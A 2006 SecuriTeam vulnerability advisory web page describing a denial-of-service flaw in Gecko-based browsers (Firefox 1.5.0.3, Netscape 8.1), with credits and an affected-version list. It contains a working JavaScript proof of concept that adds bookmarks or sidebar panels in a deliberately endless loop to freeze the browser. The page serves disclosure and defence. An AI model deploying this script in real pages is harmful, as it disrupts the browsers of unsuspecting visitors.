Security News -  Security Reviews -   Exploits -  Tools -  UNIX Focus -  Windows Focus
Ask the Team  Mailing Lists  Advertising Info  Advisories  About SecuriTeam  Blogs Brought to you by: Suppliers of: Website Testing Tools Network Testing Tools Software Testing Tools SecuriTeam in Your Inbox New vulnerability? New tool? Tell us (Our PGP key).	Gecko AddFavorite Function DoS 21 May 2006    Summary By using an endless loop to add bookmarks to the sidebar or the bookmarks on Gecko based browsers, attackers can cause a DoS condition and cause Gecko based browsers to freeze.   Credit: The information has been provided by Gianni Amato, Juha-Matti Laurio. The original article can be found at: http://www.milw0rm.com/exploits/1802 Website Security Scan Code Vulnerability Test Network Assessment Tool Detect hidden vulnerabilities Exhaustive automated testing Real-time, continuous security Get guidance from professionals of internal or 3rd party code. scanning for your entire network    Details Protect your website! Use an External Vulnerability Scanner! Nothing to install. First report in 1 hour! www.beyondsecurity.com/vulnerability-scanner Vulnerable Systems:  * Netscape Browser version 8.1  * Firefox version 1.5.0.3 By using endless loop with Gecko based web browsers to add new sidebar or bookmark, it is possible to cause Gecko to stop responding. Proof of Concept: < script language="JavaScript1.2" type="text/javascript" > function MainPageBookmark() {   title="Gianni Amato";   url="http://www.gianniamato.it/";   if (window.sidebar) {     window.sidebar.addPanel(title, url,"");   }   else if( window.external )   {     window.external.AddFavorite( url, title);   }   else if (window.opera && window.print)   {     return true;   } } for (k=0;k<k+1;k++) MainPageBookmark(); < / script>  Comments:  Add new comment:  Subject:  Name/Nick/Email:          Chars Left:	All Sections Security News Unix focus Exploits Tools Windows focus Security Reviews  Related Articles HP LaserJet Printers, HP Digital Senders Unauthorized File Access Vulnerability Mozilla Firefox NodeIterator Code Execution Vulnerability MyBB Password Reset Weak Random Numbers Vulnerability MyBB Password Reset Email BCC Injection Vulnerability Microsoft Office Publisher File Conversion TextBox Processing Buffer Overflow Vulnerability Mozilla Firefox nsTreeSelection Dangling Pointer Code Execution Vulnerability TANDBERG Video Communication Server Arbitrary File Retrieval Vulnerability Mozilla Firefox Plugin Parameter EnsureCachedAttrParamArrays Code Execution Vulnerability VMWare VMnc Codec HexTile Encoding Buffer Overflow Vulnerability VMware Products Movie Decoder Heap Overflow Vulnerability TANDBERG Video Communication Server Static SSH Host Keys Vulnerability TANDBERG Video Communication Server Authentication Bypass Vulnerability Apple QuickTime H.263 Array Index Parsing Code Execution Vulnerability VMWare VMnc Codec HexTile Encoding Two Integer Truncation Vulnerabilities Ipswitch Imail Server Mailing List Code Execution Vulnerability  Featured Articles Microsoft Windows Media Player Codec Retrieval Dangling Pointer Code Execution Vulnerability HP LaserJet Printers, HP Digital Senders Unauthorized File Access Vulnerability MyBB Password Reset Weak Random Numbers Vulnerability Mozilla Firefox nsTreeSelection Dangling Pointer Code Execution Vulnerability Mozilla Firefox DOM Attribute Cloning Remote Code Execution Oracle Secure Backup Administration $ther Variable Command Injection Code Execution Vulnerability Novell Teaming ajaxUploadImageFile Code Execution Vulnerability
	Security News - Security Reviews - Exploits - Tools - UNIX Focus - Windows Focus - Blogs - CVEs

Copyright © 1998-2010 Beyond Security® All rights reserved.
Terms of Use Site Privacy Statement.
SecuriTeam™ is a trademark of Beyond Security®